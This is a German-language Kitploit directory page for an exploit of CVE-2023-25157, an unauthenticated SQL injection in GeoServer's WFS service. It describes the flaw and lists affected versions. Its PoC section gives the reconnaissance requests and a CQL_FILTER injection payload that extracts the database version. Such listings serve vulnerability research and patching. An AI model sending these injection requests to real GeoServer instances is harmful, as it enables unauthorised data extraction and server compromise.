Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2023-25157 — Exploit für CVE-2023-25157: SQL-Injection im GeoServer-WFS-Dienst über manipulierte CQL-Filter-Syntax, die nicht authentifizierte Remote-Datenextraktion und potenzielle Kompromittierung des Datenbankservers ermöglicht. | Kitploit
Tools/GitHubGitHub/charis3306/cve-2023-25157
SchwachstellenanalyseExploitationWebanwendungs-ExploitationPenetrationstests
GitHubcharis3306/cve-2023-25157

CVE-2023-25157

Exploit für CVE-2023-25157: SQL-Injection im GeoServer-WFS-Dienst über manipulierte CQL-Filter-Syntax, die nicht authentifizierte Remote-Datenextraktion und potenzielle Kompromittierung des Datenbankservers ermöglicht.

Repository anzeigen
31vor 1 JahrNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

Beschreibung der Schwachstelle

Da keine Filterung der Benutzereingaben erfolgt, können nicht authentifizierte Angreifer eine fehlerhafte Filtersyntax konstruieren, die lexikalische Analyse von GeoServer umgehen und so eine SQL-Injection durchführen. Dies ermöglicht den Zugriff auf vertrauliche Informationen auf dem Server und möglicherweise die Übernahme der Datenbank-Server-Berechtigungen.

Betroffene Versionen

GeoServer 2.20.x < 2.20.7

GeoServer 2.19.x < 2.19.7

GeoServer 2.18.x < 2.18.7

GeoServer 2.21.x < 2.21.4

GeoServer 2.22.x < 2.22.2

POC

Verfügbare Feature-Namen abrufen

Suche

root@kitploit:~
/geoserver/ows?service=WFS&version=1.0.0&request=GetCapabilities

Verfügbare Attribute des zugehörigen Features abrufen

Feature-Name – zugehörige Attribute abrufen

vulhub:example
root@kitploit:~
/geoserver/wfs?request=DescribeFeatureType&version=2.0.0&service=WFS&outputFormat=application/json&typeName=vulhub:example

root@kitploit:~
/geoserver/ows?service=wfs&version=1.0.0&request=GetFeature&typeName=vulhub:example&CQL_FILTER=strStartsWith(name,'x'')+=+true+and+1=(SELECT+CAST+((SELECT+version())+AS+INTEGER))+--+')+=+true

Tool herunterladen